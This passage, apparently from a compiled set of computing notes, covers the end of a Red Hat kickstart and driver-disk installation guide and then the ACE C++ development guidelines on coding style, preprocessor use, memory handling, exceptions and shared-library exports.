o linux ks=floppy

o If you are not using a kickstart file, just press ENTER for the default installation

5. Complete the installation:


o If you are doing an automated installation, you must complete every part of the configuration process that you left out of the kickstart file. If you have a complete kickstart file you are all set, so go get a cup of something nice and wait for the installation to finish.

o If you are doing a manual installation, you must complete the installation in the normal way, going through each menu of the RedHat installation program and selecting the options required for your computer. When you have finished, it is time for a cup of something nice; there is no need to change installation disks.

Further boot options

This is an extension of the technique used to boot the client computers for the automated installation described above. Try this method if you have tried and failed with the previous one. This section should help if you had network connection problems during boot, for example if your network card is not supported by the boot floppy.

You can create a second floppy to use in the boot process, containing additional drivers for network cards. It can be read at boot time and the drivers for your card loaded from there. This is done as follows:

1. In the images directory on your CD you should find a file called drvnet.img.
2. From the images directory of your CD, copy the file to a different floppy with the command:
3. dd if=drvnet.img of=/dev/fd0

Again, make sure your floppy is not mounted when you run this command.

4. You now have a floppy with the network drivers. Go back to your installation as described above, but now add the keyword dd to your command line.

o So for automated installations we would type:
o linux dd ks=floppy

o For a manual installation we would type:
o linux dd

5. When you are asked whether you have a driver disk, select YES. Then swap the boot disk for your driver disk, and the extra drivers will be loaded and used to detect your network card.

6. You should now continue with the installation as described above.


http://www.dre.vanderbilt.edu/~schmidt/DOC_ROOT/ACE/docs/ACE-guidelines.html

ACE Software Development Guidelines ( C++ )

General

o Every text file must end with a newline.
o Use spaces instead of tabs, except in Makefiles. Emacs users can add this to their .emacs:

(setq-default indent-tabs-mode nil)

Microsoft Visual C++ users should do the following:

Choose: Tools -- Options -- Tabs
Then set: "Tab size" to 8 and "Indent size" to 2, and indent using spaces.

o Do not end text lines with spaces. Emacs users can add this to their .emacs:

(setq-default nuke-trailing-whitespace-p t)

Note for Microsoft Visual Studio .NET Users:

There is a macro project (ace_guidelines.vsmacros) located in $ACE_ROOT/docs that replaces tabs with spaces and removes trailing spaces each time you save a file.

o Try to limit the length of source code lines to less than 80 characters. Users with 14 inch monitors appreciate it when reading code. And, it avoids mangling problems with email and net news.

o Try to avoid creating files with excessively long names (more than about 45 characters). Moreover, ensure that the names of generated files (e.g. those produced by MakeProjectCreator or tao_idl) do not go beyond that limit either. Some operating systems cannot handle very long file names correctly.

o If you add a comment to code that is directed to, or requires the attention of, a particular individual: SEND EMAIL TO THAT INDIVIDUAL!

o Every program should have a "usage" message. It should be printed out if erroneous command line arguments, or a -? command line argument, are provided to the program.

o An ACE-using program's entry point should use the portable form:

int ACE_TMAIN (int argc, ACE_TCHAR *argv[])

This form is portable to all ACE platforms whether using narrow or wide characters. The other two common forms:

int main (int argc, char *argv[])
int wmain (int argc, wchar_t *argv[])

as well as any other main entrypoint form should only be used when there is some overarching reason to not use the portable form. One example would be a Windows GUI program that requires WinMain.

See $ACE_ROOT/docs/wchar.txt for more information on ACE support on wchar.

o The program entry point function, in any form mentioned above, must always be declared with arguments, e.g.,

int
ACE_TMAIN (int argc, ACE_TCHAR *argv[])
{
  [...]

  return 0;
}

If you don't use the argc and/or argv arguments, don't declare them, e.g.,

int ACE_TMAIN (int, ACE_TCHAR *[])
{
  [...]

  return 0;
}

Please declare the second argument as ACE_TCHAR *[] instead of ACE_TCHAR ** or char *[]. Ancient versions of MSVC++ complained about ACE_TCHAR **, and char *[] is not Unicode-compliant.

main must also return 0 on successful termination, and non-zero otherwise.

o Avoid use of floating point types (float and double) and operations unless absolutely necessary. Not all ACE platforms support them. Therefore, wherever they are used, ACE_LACKS_FLOATING_POINT conditional code must also be used.

o Avoid including the string "Error" in a source code filename. GNU Make's error messages start with "Error". So, it's much easier to search for errors if filenames don't contain "Error".

o Narrow interfaces are better than wide interfaces. If there isn't a need for an interface, leave it out. This eases maintenance, minimizes footprint, and reduces the likelihood of interference when other interfaces need to be added later. (See the ACE_Time_Value example.)

o Never use assert() macros or related constructs (such as abort()) calls in core ACE, TAO, and CIAO library/framework code. These macros are a major problem for production software that uses this code since the error-handling strategy (i.e., abort the process) is excessive. Instead, extract out the expressions from assert() macros and use them as preconditions/postconditions/invariants in the software and return any violations of these conditions/invariants via exceptions or error return values. It's fine to use assert() macros et al. in test programs, but make sure these tests never find their way into the core ACE, TAO, and CIAO library/framework code base.

Coding Style

o When writing ACE, TAO, and CIAO class and method names, make sure to use underscores ('_') to separate the parts of a name rather than intercaps. For example, use

class ACE_Monitor_Control
{
public:
  int read_monitor (void);
  // ...
};

rather than

class ACEMonitorControl
{
public:
  int readMonitor (void);
  // ...
};

Code Documentation

o Use comments and whitespace (:-) liberally. Comments should consist of complete sentences, i.e., start with a capital letter and end with a period.
o Insert an svn keyword string at the top of every source file, Makefile, config file, etc. For C++ files, it is:

// $Id$

It is not necessary to fill in the fields of the keyword string, or modify them when you edit a file that already has one. SVN does that automatically when you checkout or update the file.

To insert that string at the top of a file:

perl -pi -e 'if (! $o) {printf "// \$Id\$\n\n";}; $o = 1;' file

o Be sure to follow the guidelines and restrictions for use of the documentation tools for ACE header files, which must follow the Doxygen format requirements. The complete documentation for Doxygen is available in the Doxygen manual. For an example header file using Doxygen-style comments, please refer to ACE.h.

o The header file comment should at least contain the following entries:

/**
 * @file Foo.h
 * @author Authors Name <[email protected]>
 *
 * A few words describing the file.
 */

o A class should be commented this way:

/**
 * @class Foo_Impl
 * @brief A brief description of the class
 *
 * A more detailed description.
 */

o The preferred way to document methods is:

/// This function foos the bars
/// another line of documentation if necessary
/// @param bar The bar you want to foo
void foo (int bar);

o All binary options for ACE and TAO should be specified in terms of the integral values 0 and 1, rather than "true" and "false" or "yes" and "no". All TAO options should be documented in the online TAO options document.


Preprocessor

o Never #include standard headers directly, except in a few specific ACE files, e.g., OS.h and stdcpp.h. Let those files #include the correct headers. If you do not do this, your code will not compile with the Standard C++ Library.

o Always use #if defined (MACRONAME) to test if a macro is defined, rather than the simpler #if MACRONAME. Doxygen requires this. The one exception to this is the macros used to prevent multiple inclusion of header files, as shown below.


o Always follow a preprocessor #endif with a /* */ C-style comment. Using C-style comments with preprocessor code is required for some old compilers. It should correspond to the condition in the matching #if directive. For example,

#if defined (ACE_HAS_THREADS)
# if defined (ACE_HAS_STHREADS)
#   include /**/ <synch.h>
#   include /**/ <thread.h>
#   define ACE_SCOPE_PROCESS P_PID
#   define ACE_SCOPE_LWP P_LWPID
#   define ACE_SCOPE_THREAD (ACE_SCOPE_LWP + 1)
# else
#   define ACE_SCOPE_PROCESS 0
#   define ACE_SCOPE_LWP 1
#   define ACE_SCOPE_THREAD 2
# endif /* ACE_HAS_STHREADS */
#endif /* ACE_HAS_THREADS */

o Be sure to put spaces around comment delimiters, e.g., char * /* foo */ instead of char */*foo*/. MS VC++ complains otherwise.

o Always insert a /**/ between an #include and filename, for system headers and ace/pre.h and ace/post.h as shown in the above example. This avoids dependency problems with Visual C++ and prevents Doxygen from including the headers in the file reference trees.

o Be very careful with names of macros, enum values, and variables. It's always best to prefix them with something like ACE_ or TAO_. There are too many system headers out there that #define OK, SUCCESS, ERROR, index, s_type, and so on.

o When using macros in an arithmetic expression, be sure to test that the macro is defined, using defined(macro) before specifying the expression. For example:

#if __FreeBSD__ < 3

will evaluate true on any platform where __FreeBSD__ is not defined. The correct way to write that guard is:

#if defined (__FreeBSD__) && __FreeBSD__ < 3

If using g++, problems like this can be flagged as a warning by using the "-Wundef" command line option.

o Try to centralize #ifdefs with typedefs and #defines. For example, use this:

#if defined (ACE_PSOS)
typedef long ACE_NETIF_TYPE;
# define ACE_DEFAULT_NETIF 0
#else /* ! ACE_PSOS */
typedef const TCHAR* ACE_NETIF_TYPE;
# define ACE_DEFAULT_NETIF ASYS_TEXT("le0")
#endif /* ! ACE_PSOS */

instead of:

#if defined (ACE_PSOS)

// pSOS supports numbers, not names for network interfaces

long net_if,

#else /* ! ACE_PSOS */

const TCHAR *net_if,


#endif /* ! ACE_PSOS */

o Protect header files against multiple inclusion with this construct:

#ifndef FOO_H
#define FOO_H

[contents of header file]

#endif /* FOO_H */

This exact construct (note the #ifndef) is optimized by many compilers such that they only open the file once per compilation unit. Thanks to Eric C. Newton <[email protected]> for pointing that out.

If the header #includes an ACE library header, then it's a good idea to include the #pragma once directive:

#ifndef FOO_H
#define FOO_H

#include "ace/ACE.h" #if !defined (ACE_LACKS_PRAGMA_ONCE) # pragma once #endif /* ACE_LACKS_PRAGMA_ONCE */

[contents of header file]

#endif /* FOO_H */

#pragma once must be protected, because some compilers complain about it. The protection depends on ACE_LACKS_PRAGMA_ONCE, which is defined in some ACE config headers. Therefore, the protected #pragma once construct should only be used after an #include of an ACE library header. Note that many compilers enable the optimization if the #ifndef protection construct is used, so for them, #pragma once is superfluous.

No code can appear after the final #endif for the optimization to be effective and correct.

o Files that contain parametric classes should follow this style:

#ifndef FOO_T_H
#define FOO_T_H

#include "ace/ACE.h"
#if !defined (ACE_LACKS_PRAGMA_ONCE)
# pragma once
#endif /* ACE_LACKS_PRAGMA_ONCE */

// Put your template declarations here...

#if defined (__ACE_INLINE__)
#include "Foo_T.inl"
#endif /* __ACE_INLINE__ */

#if defined (ACE_TEMPLATES_REQUIRE_SOURCE)
#include "Foo_T.cpp"
#endif /* ACE_TEMPLATES_REQUIRE_SOURCE */

#if defined (ACE_TEMPLATES_REQUIRE_PRAGMA)
#pragma implementation "Foo_T.cpp"
#endif /* ACE_TEMPLATES_REQUIRE_PRAGMA */

#endif /* FOO_T_H */

Notice that some compilers need to see the code of the template, hence the .cpp file must be included from the header file.

To avoid multiple inclusions of the .cpp file it should also be protected as in:

#ifndef FOO_T_CPP
#define FOO_T_CPP

#include "Foo_T.h" #if !defined (ACE_LACKS_PRAGMA_ONCE) # pragma once #endif /* ACE_LACKS_PRAGMA_ONCE */

#if !defined (__ACE_INLINE__)
#include "ace/Foo_T.inl"
#endif /* __ACE_INLINE__ */

// put your template code here

#endif /* FOO_T_CPP */

Finally, you may want to include the template header file from a non-template header file (check $ACE_ROOT/ace/Synch.h); in such a case the template header should be included after the inline function definitions, as in:

#ifndef FOO_H
#define FOO_H

#include "ace/ACE.h" #if !defined (ACE_LACKS_PRAGMA_ONCE) # pragma once #endif /* ACE_LACKS_PRAGMA_ONCE */

// Put your non-template declarations here...

#if defined (__ACE_INLINE__)
#include "Foo.inl"
#endif /* __ACE_INLINE__ */

#include "Foo_T.h"

#endif /* FOO_H */

o Avoid #include <math.h> if at all possible. The /usr/include/math.h on SunOS 5.5.1 through 5.7 defines a struct named exception, which complicates the use of exceptions.

o In a .cpp file always include the corresponding header file first, like this:

// This is Foo.cpp

#include "Foo.h"
#include "tao/Bar.h"
#include "ace/Baz.h"

// Here comes the Foo.cpp code....

In this way we are sure that the header file is self-contained and can be safely included from some place else.

o In the TAO library never include <corba.h>; this file should only be included by the user, and it introduces cyclic dependencies in the library that we must avoid.


o Never include a header file when a forward reference will do, remember that templates can be forward referenced too. Consult your favorite C++ book to find out when you must include the full class definition.

C++ Syntax and Constructs

o for loops should look like:

for (unsigned int i = 0; i < count; ++i)
  ++total;

Though, I prefer to always wrap the body of the loop in braces, to avoid surprises when other code or debugging statements are added, and to maintain sanity when the body consists of a macro, such as an ACE_ASSERT without a trailing semicolon:

for (unsigned int i = 0; i < count; ++i)
  {
    ACE_ASSERT (++total < UINT_MAX);
  }

Similarly, if statements should have a space after the "if", and no spaces just after the opening parenthesis and just before the closing parenthesis.

o If a loop index is used after the body of the loop, it must be declared before the loop. For example,

size_t i = 0;
for (size_t j = 0; file_name [j] != '\0'; ++i, ++j)
  {
    if (file_name [j] == '\\' && file_name [j + 1] == '\\')
      ++j;

    file_name [i] = file_name [j];
  }

// Terminate this string.
file_name [i] = '\0';

o Prefix operators are generally more efficient than postfix operators. Therefore, they are preferred over their postfix counterparts where the expression value is not used.

Therefore, use this idiom for iterators, with prefix operator on the loop index:

ACE_Ordered_MultiSet<int> set;
ACE_Ordered_MultiSet_Iterator<int> iter (set);

for (i = -10; i < 10; ++i)
  set.insert (2 * i + 1);

rather than the postfix operator:

for (i = -10; i < 10; i++)
  set.insert (2 * i + 1);

o Prefer using if (...) else ... instead of the ?: operator. It is a lot less error prone, and will help you avoid bugs caused by the precedence of ?: compared with other operators in an expression.
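A hypothetical illustration of the precedence trap this bullet warns about; the URGENT flag and both helper functions are invented for the example and are not part of ACE:

```cpp
enum { URGENT = 0x4 };

// Intended: flags | (is_urgent ? URGENT : 0).  But | binds tighter than
// ?:, so this parses as (flags | is_urgent) ? URGENT : 0 and the
// original flags are discarded whenever the left side is nonzero.
int flags_buggy (int flags, bool is_urgent)
{
  return flags | is_urgent ? URGENT : 0;
}

// The if/else version cannot be mis-parsed.
int flags_clear (int flags, bool is_urgent)
{
  if (is_urgent)
    return flags | URGENT;
  else
    return flags;
}
```

With flags = 0x1 and is_urgent = false, the buggy version returns 0x4 while the if/else version returns 0x1.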

o When a class provides operator==, it must also provide operator!=. Also, both these operators must be const and return bool.
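A minimal sketch of this rule, using a hypothetical Point_2D class (not part of ACE): both operators are const and return bool, and operator!= is defined in terms of operator== so the two can never disagree.

```cpp
class Point_2D
{
public:
  Point_2D (int x, int y) : x_ (x), y_ (y) {}

  // Both comparison operators are const and return bool.
  bool operator== (const Point_2D &rhs) const
  {
    return this->x_ == rhs.x_ && this->y_ == rhs.y_;
  }

  // Defined via operator== so equality and inequality stay consistent.
  bool operator!= (const Point_2D &rhs) const
  {
    return !(*this == rhs);
  }

private:
  int x_;
  int y_;
};
```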

o Avoid unnecessary parenthesis. We're not writing Lisp :-)


o Put inline member functions in a .inl file. That file is conditionally included by both the .h file, for example:

class ACE_Export ACE_High_Res_Timer
{
  [...]
};

#if defined (__ACE_INLINE__)
#include "ace/High_Res_Timer.inl"
#endif /* __ACE_INLINE__ */

and .cpp file:

#define ACE_BUILD_DLL
#include "ace/High_Res_Timer.h"

#if !defined (__ACE_INLINE__)
#include "ace/High_Res_Timer.inl"
#endif /* __ACE_INLINE__ */

ACE_ALLOC_HOOK_DEFINE(ACE_High_Res_Timer)

NOTE: It is very important to ensure that an inline function will not be used before its definition is seen. Therefore, the inline functions in the .inl file should be arranged properly. Some compilers, such as g++ with the -Wall option, will issue warnings for violations.

o Some inlining heuristics:

One-liners should almost always be inline, as in:

ACE_INLINE
Foo::bar () { this->baz (); }

The notable exception is virtual functions, which should generally not be inlined. Big (more than 10 lines) and complex functions (more than one if () statement, or a switch, or a loop) should not be inlined. Medium sized stuff depends on how performance critical it is. If you know that it's in the critical path, then make it inline. When in doubt, profile the code.

o ACE_Export must be inserted between the class keyword and the class name for all classes that are exported from libraries, as shown in the example above. However, do not use ACE_Export for template classes, or for classes that are not used outside the ACE library.

o Mutators and accessors should be of this form:

/// Sets @c object_addr_ cache from @c host and @c port.
void object_addr (const ACE_INET_Addr &);

/// Returns the ACE_INET_Addr for this profile.
const ACE_INET_Addr &object_addr (void) const;

instead of the "set_" and "get_" form.

o Never use delete to deallocate memory that was allocated with malloc. Similarly, never associate free with new. ACE_NEW or ACE_NEW_RETURN should be used to allocate memory, and delete should be used to deallocate it. And be careful to use the correct form, delete or delete [] to correspond to the allocation.


o Don't check for a pointer being 0 before deleting it. It's always safe to delete a 0 pointer. If the pointer is visible outside the local scope, it's often a good idea to 0 it _after_ deleting it. Note, the same argument applies to free().
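A small sketch of both points above: delete (and delete []) on a 0 pointer is a no-op, so no guard is needed, and zeroing the pointer after deletion makes a repeated release harmless. Buffer_Holder is a hypothetical example type, not an ACE class.

```cpp
struct Buffer_Holder
{
  int *data_;

  Buffer_Holder (void) : data_ (new int[16]) {}

  ~Buffer_Holder (void) { this->release (); }

  void release (void)
  {
    // No "if (this->data_)" guard: deleting a 0 pointer is safe.
    delete [] this->data_;   // matches the new[] in the constructor
    this->data_ = 0;         // a second release () is now a no-op
  }
};
```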

o Always use ACE_NEW or ACE_NEW_RETURN to allocate memory, because they check for successful allocation and set errno appropriately if it fails.

o Never compare or assign a pointer value with NULL; use 0 instead. The language allows any pointer to be compared or assigned with 0. The definition of NULL is implementation dependent, so it is difficult to use portably without casting.

o Never cast a pointer to or from an int or a long. On all currently supported ACE platforms, it is safe to cast a pointer to or from intptr_t or uintptr_t (include ace/Basic_Types.h).

o Be very careful when selecting an integer type that must be a certain size, e.g., 4 bytes. long is not 4 bytes on all platforms; it is 8 bytes on many 64-bit machines. ACE_UINT32 is always 4 bytes, and ACE_UINT64 is always 8 bytes.
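The ACE_UINT32/ACE_UINT64 typedefs are not reproduced here; as a stand-in, the standard <cstdint> fixed-width types illustrate the same point: long has no guaranteed size, while uint32_t and uint64_t do.

```cpp
#include <cstdint>
#include <climits>

// uint32_t and uint64_t have exact sizes on every conforming platform;
// long only guarantees *at least* 32 bits, and is 8 bytes on most
// 64-bit Unix systems.
static_assert (sizeof (std::uint32_t) == 4, "uint32_t is always 4 bytes");
static_assert (sizeof (std::uint64_t) == 8, "uint64_t is always 8 bytes");
static_assert (sizeof (long) * CHAR_BIT >= 32, "long is only a lower bound");
```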

o If a class has any virtual functions, and its destructor is declared explicitly in the class, then the destructor should always be virtual as well. And to support compiler activities such as generation of virtual tables and, in some cases, template instantiation, the virtual destructor should not be inline. (Actually, any non-pure virtual function could be made non-inline for this purpose. But, for convenience, if its performance is not critical, it is usually easiest just to make the virtual destructor non-inline.)
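A minimal sketch of why the destructor must be virtual in a polymorphic base: without it, deleting a Derived object through a Base pointer would skip the Derived destructor. These classes are hypothetical, not from ACE.

```cpp
static int derived_dtor_calls = 0;

class Base
{
public:
  virtual ~Base (void) {}       // virtual: safe to delete via a Base *
  virtual int id (void) const { return 0; }
};

class Derived : public Base
{
public:
  virtual ~Derived (void) { ++derived_dtor_calls; }
  virtual int id (void) const { return 1; }
};
```

Deleting `new Derived` through a `Base *` now runs ~Derived exactly once, because ~Base is virtual.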

o Avoid default arguments unless there's a good reason. An example of how they got us into a jam:

ACE_Time_Value (long sec, long usec = 0);

So, ACE_Time_Value (2.5) has the unfortunate effect of coercing the 2.5 to a long with value 2. That's probably not what the programmer intended, and many compilers don't warn about it.

A nice fix would be to add an ACE_Time_Value (double) constructor. But, that would cause ambiguous overloading due to the default value for the second argument of ACE_Time_Value (long sec, long usec = 0). We're stuck with ACE_Time_Value, but now we know that it's easy to avoid.
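The jam can be reproduced with a hypothetical mock of the constructor (not the real ACE_Time_Value): the default second argument makes the one-argument call legal, and the double 2.5 is silently coerced to the long 2.

```cpp
class Time_Value   // hypothetical mock, not the real ACE_Time_Value
{
public:
  // The default usec argument is what makes Time_Value (2.5) compile:
  // 2.5 is implicitly coerced to the long 2, losing the half second.
  Time_Value (long sec, long usec = 0) : sec_ (sec), usec_ (usec) {}

  long sec (void) const { return this->sec_; }
  long usec (void) const { return this->usec_; }

private:
  long sec_;
  long usec_;
};
```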

o Constructor initializers must appear in the same order as the data members are declared in the class header. This avoids subtle errors, because initialization takes place in the order of member declaration.
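A sketch of why the order matters, with a hypothetical Name_Holder class: len_ is initialized from str_, which is only safe because str_ is declared (and therefore initialized) first.

```cpp
#include <cstring>
#include <cstddef>

class Name_Holder
{
public:
  Name_Holder (const char *s)
    : str_ (s),                   // runs first: str_ is declared first
      len_ (std::strlen (str_))   // safe only because str_ is already set
  {}

  std::size_t length (void) const { return this->len_; }

private:
  const char *str_;   // declared first, so initialized first
  std::size_t len_;   // swapping these two declarations would make
                      // len_ read an uninitialized str_
};
```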

o Initialization is usually cleaner than assignment, especially in a conditional. So, instead of writing code like this:

ssize_t n_bytes;

// Send multicast of one byte, enough to wake up server.
if ((n_bytes = multicast.send ((char *) &reply_port,
                               sizeof reply_port)) == -1)

Write it like this:

ssize_t n_bytes = multicast.send ((char *) &reply_port,
                                  sizeof reply_port);

// Send multicast of one byte, enough to wake up server.
if (n_bytes == -1)

But, beware if the initialization is of a static variable. A static variable is only initialized the first time its declaration is seen. Of course, we should avoid using static (and non-constant) variables at all.


o It is usually clearer to write conditionals that have both branches without a negated condition. For example,

if (test)
  {
    // true branch
  }
else
  {
    // false branch
  }

is preferred over:

if (! test)
  {
    // false test branch
  }
else
  {
    // true test branch
  }

o If a cast is necessary, avoid use of C-style "sledgehammer" casts. Use standard C++ casts (e.g. static_cast<int> (foo)) instead.
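Two small illustrations of the standard casts; the helper functions are hypothetical:

```cpp
// static_cast documents an intentional, checked conversion where a
// C-style "(int) ratio" would hide the intent.
int truncate (double ratio)
{
  return static_cast<int> (ratio);   // truncates toward zero
}

// const_cast names exactly which qualifier is being removed; a C-style
// cast could silently change the type as well.
char *unconst (const char *s)
{
  return const_cast<char *> (s);
}
```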

o In general, if instances of a class should not be copied, then a private copy constructor and assignment operator should be declared for the class, but not implemented. For example:

// Disallow copying by not implementing the following . . .
ACE_Object_Manager (const ACE_Object_Manager &);
ACE_Object_Manager &operator= (const ACE_Object_Manager &);

If the class is a template class, then the ACE_UNIMPLEMENTED_FUNC macro should be used:

// = Disallow copying...
ACE_UNIMPLEMENTED_FUNC (ACE_TSS (const ACE_TSS<TYPE> &))
ACE_UNIMPLEMENTED_FUNC (void operator= (const ACE_TSS<TYPE> &))

ACE_UNIMPLEMENTED_FUNC can be used with non-template classes as well. Though for consistency and maximum safety, it should be avoided for non-template classes.

o Never use BOOL, or similar types. (ACE_CDR::Boolean and CORBA::Boolean are acceptable). Use the standard C++ bool for boolean variables, instead.

o Functions should always return -1 to indicate failure, and 0 or greater to indicate success.
o Separate the code of your templates from the code for non-parametric classes: some compilers get confused when template and non-template code is mixed in the same file.
o It's a good idea to specify the include path (with -I) to include any directory which contains files with template definitions. The Compaq Tru64 cxx -ptv compiler option may help diagnose missing template instantiation problems.

o When referring to member variables and functions, use this->member. This makes it clear to the reader that a class member is being used. It also makes it crystal clear to the compiler which variable/function you mean in cases where it might make a difference.

o Don't use template template arguments; this C++ construct is not supported by the HP aCC 3.70 compiler at this moment. For example, the following template declaration is one that just doesn't work:

template <typename S_var, size_t BOUND, template <typename> class Insert_Policy>
class A {};

Page 126: Appunti Informatica

I/O

o Use ACE_DEBUG for printouts, and ACE_OS::fprintf () for file I/O. Avoid using iostreams because of implementation differences across platforms.

o After attempting to open an existing file, always check for success. Take appropriate action if the open failed.

o Notice that ACE_DEBUG and ACE_ERROR don't support %ld or any other multicharacter format.

WCHAR conformity

o For ACE, use ACE_TCHAR instead of char for strings and ACE_TEXT() around string literals. Exceptions are char arrays used for data and strings that need to remain as 1 byte characters.

o If you have a char string that needs to be converted to ACE_TCHAR, use the ACE_TEXT_CHAR_TO_TCHAR() macro. If you have an ACE_TCHAR string that needs to be converted to a char string, use the ACE_TEXT_ALWAYS_CHAR() macro.

o Do not use the Win32 TCHAR macros. The wide character-ness of ACE is separate from UNICODE and _UNICODE.

o For TAO, don't use ACE_TCHAR or ACE_TEXT. The CORBA specification defines APIs as using char. So most of the time there is no need to use wide characters.

Exceptions

o There are many ways of throwing and catching exceptions. The code below gives several examples. Note that each method has different semantics and costs. Whenever possible, use the first approach.

#include "iostream.h"

class exe_foo
{
public:
  exe_foo (int data) : data_ (data)
  { cerr << "constructor of exception called" << endl; }
  ~exe_foo ()
  { cerr << "destructor of exception called" << endl; }
  exe_foo (const exe_foo& foo) : data_ (foo.data_)
  { cerr << "copy constructor of exception called" << endl; }
  int data_;
};

void
good (int a)
{
  throw exe_foo (a);
}

void
bad (int a)
{
  exe_foo foo (a);
  throw foo;
}

int main ()
{
  cout << endl << "First exception" << endl << endl;
  try
    {
      good (0);
    }
  catch (exe_foo &foo)
    {
      cerr << "exception caught: " << foo.data_ << endl;
    }

  cout << endl << "Second exception" << endl << endl;
  try
    {
      good (0);
    }
  catch (exe_foo foo)
    {
      cerr << "exception caught: " << foo.data_ << endl;
    }

  cout << endl << "Third exception" << endl << endl;
  try
    {
      bad (1);
    }
  catch (exe_foo &foo)
    {
      cerr << "exception caught: " << foo.data_ << endl;
    }

  cout << endl << "Fourth exception" << endl << endl;
  try
    {
      bad (1);
    }
  catch (exe_foo foo)
    {
      cerr << "exception caught: " << foo.data_ << endl;
    }

  return 0;
}

Output is:

First exception

constructor of exception called
exception caught: 0
destructor of exception called

Second exception

constructor of exception called
copy constructor of exception called
exception caught: 0
destructor of exception called
destructor of exception called

Third exception

constructor of exception called
copy constructor of exception called
destructor of exception called
exception caught: 1
destructor of exception called

Fourth exception

constructor of exception called
copy constructor of exception called
destructor of exception called
copy constructor of exception called
exception caught: 1
destructor of exception called
destructor of exception called

Compilation

o Whenever you add a new test or example to ACE or TAO, make sure that you modify the MPC file in the parent directory. This will make sure that your code gets compiled on a regular basis.

ACE Shared Library Guidelines

Create a separate export macro for each dynamic library. A header file containing the export macro and additional support macros should be generated by using the ACE_wrappers/bin/generate_export_file.pl Perl script.

Make sure that your classes, structures and free functions are annotated with this export macro. The only exceptions are pure template classes, structures and free functions.

Only classes (and structures, free functions, etc.) that are part of the library public interface must be exported (e.g. declared with an export macro). Those that are only meant to be used internally need not be exported, particularly for g++ >= 4.0, since doing so defeats some neat optimizations. Here's a common case where an export macro is generally used unnecessarily:

class FooExport Foo
{
public:
  virtual void kung_fu () = 0;
};

class FooExport Bar : public Foo
{
public:
  virtual void kung_fu () { ... }
};

class FooExport FooFactory
{
public:
  Foo * make_foo ()
  {
    // Assume that this implementation is hidden from
    // the application and is consequently out of line.
    return new Bar ();
  }
};

Here the application is only meant to invoke operations through a pointer or reference to the abstract base class "Foo" created by the "FooFactory", not the "Bar" subclass. In this case, exporting "Bar" is unnecessary. If your concrete class is meant to be used outside of the shared library (e.g. as a template parameter, within a dynamic_cast<>, etc) you must then export it. Otherwise, avoid doing so if you can.


Make sure that you specify that you are creating a dynamic library in your MPC file by adding a sharedname tag.

Make sure that you add the FOO_BUILD_DLL preprocessor symbol to the dynamicflags of the MPC project that is used to build a library. Note that the export files are setup such that when this macro is defined, the symbols are exported, otherwise they are imported. The default behaviour is to set up for import so that clients of your library don't need to worry about arcane build flags like FOO_BUILD_DLL in their build setup. This ties back to the first item.

When you specify the order of libraries to link to, make sure that the dependent libraries come after the libraries which depend on them, i.e., your link line should always contain -lDependsOnFoo -lFoo. Note that this is not a requirement on GNU/Linux but linkers on other platforms are not as forgiving.

Use the ACE_SINGLETON_DECLARE macro to declare a class as a singleton. Declare exported (i.e. default visibility) singleton templates prior to typedefs that reference them. This prevents g++ 4.0 from silently making their visibility hidden (see Bug 2260 for details).

Avoid inlining virtual functions in classes that must be exported since doing so can cause RTTI related problems (e.g. dynamic_cast<> failures) when using g++ >= 4.0 due to our use of that compiler's "visibility attribute" support that is tied in to the export macros. This includes virtual destructors automatically created by the compiler when you don't declare one. Make sure you define a no-op out-of-line virtual destructor if your base class has a virtual destructor since you may otherwise run into the mentioned RTTI problems.

ACE Usage Guidelines

Always use the ACE_OS namespace functions instead of bare OS system calls.

As a general rule, the only functions that should go into the ACE_OS namespace are ones that have direct equivalents on some OS platform. Functions that are extensions should go in the ACE namespace.

Use the ACE_SYNCH_MUTEX macro, instead of using one of the specific mutexes, such as ACE_Thread_Mutex. This provides portability between threaded and non-threaded platforms.

Avoid creating a static instance of a user-defined (class) type. Instead, create it as an ACE_Singleton, an ACE_TSS_Singleton, or an ACE_Cleanup object. See the ACE Singleton.h, Object_Manager.h, and Managed_Object.h header files for more information.

Static instances of built-in types, such as int or any pointer type, are fine.

Construction of a static instance of a user-defined type should never spawn threads. Because the order of construction of statics across files is not defined by the language, it is usually assumed that only one thread exists during static construction. This allows statics such as locks to be safely created. We do not want to violate this assumption.

Do not use C++ exception handling directly. Some platforms do not support it, and it can impose an execution speed penalty. Instead, use the TAO/ACE try/catch macros.

Because ACE does not use exception handling, dealing with failures requires a bit of care. This is especially true in constructors. Consider the following approach:

ACE_NEW_RETURN (this->name_space_, LOCAL_NAME_SPACE, -1);
if (ACE_LOG_MSG->op_status () != 0)
  ....


This snippet of code is from ACE_Naming_Context. All failed constructors in ACE (should) call ACE_ERROR. This sets the thread-specific op_status, which can be checked by the caller. This mechanism allows the caller to check for a failed constructor without requiring the constructor to throw exceptions.

Another consequence of ACE's avoidance of exception handling is that you should use open() methods on classes that perform initializations that can fail. This is because open() returns an error code that's easily checked by the caller, rather than relying on constructor and thread-specific status values.

Avoid using the C++ Standard Template Library (STL) in our applications. Some platforms do not support it yet. It is safe to use the STL generic algorithms. The following have been used already and don't seem to cause any portability issues:

std::swap
std::for_each
std::fill
std::generate
std::transform
std::copy

Be very careful with ACE_ASSERT. It must only be used to check values; it may never be used to wrap a function call, or contain any other side effect. That's because the statement will disappear when ACE_NDEBUG is enabled. For example, this code is BAD:

ACE_ASSERT (this->next (retv) != 0); // BAD CODE!

Instead, the above should be coded this way:

int const result = this->next (retv);
ACE_ASSERT (result != 0);
ACE_UNUSED_ARG (result);

Never put side effects in ACE_DEBUG code:

ACE_DEBUG ((LM_DEBUG,
            "handling signal: %d iterations left\n",
            --this->iterations_)); // BAD CODE!

Note that this won't work correctly if ACE_NDEBUG is defined, for the same reason that having side-effects in ACE_ASSERTs won't work either, i.e., because the code is removed.

Be very careful with the code that you put in a signal handler. On Solaris, the man pages document systems calls as being Async-Signal-Safe if they can be called from signal handlers. In general, it's best to just set a flag in a signal handler and take appropriate action elsewhere. It's also best to avoid using signals, especially asynchronous signals.

Immediately after opening a temporary file, unlink it. For example:

ACE_HANDLE h = /* open the file (filename) */;
ACE_OS::unlink (filename);

This avoids leaving the temporary file even if the program crashes.

Be sure to specify the THR_BOUND thread creation flag for time-critical threads. This ensures that the thread competes for resources globally on Solaris. It is harmless on other platforms.


Other ACE and TAO Guidelines

When enhancing, updating, or fixing ACE or TAO, always:

1. Test your change on at least Windows and Linux before committing. After committing, watch the scoreboard to catch errors on other platforms that may be related to your change.

2. Add an entry to the appropriate ChangeLog. TAO and some ACE subdirectories, such as ASNMP, JAWS, and gperf, have their own ChangeLogs. If you don't use one of those, use the ChangeLog in the top-level ACE_wrappers directory. A ChangeLog entry should have the form:

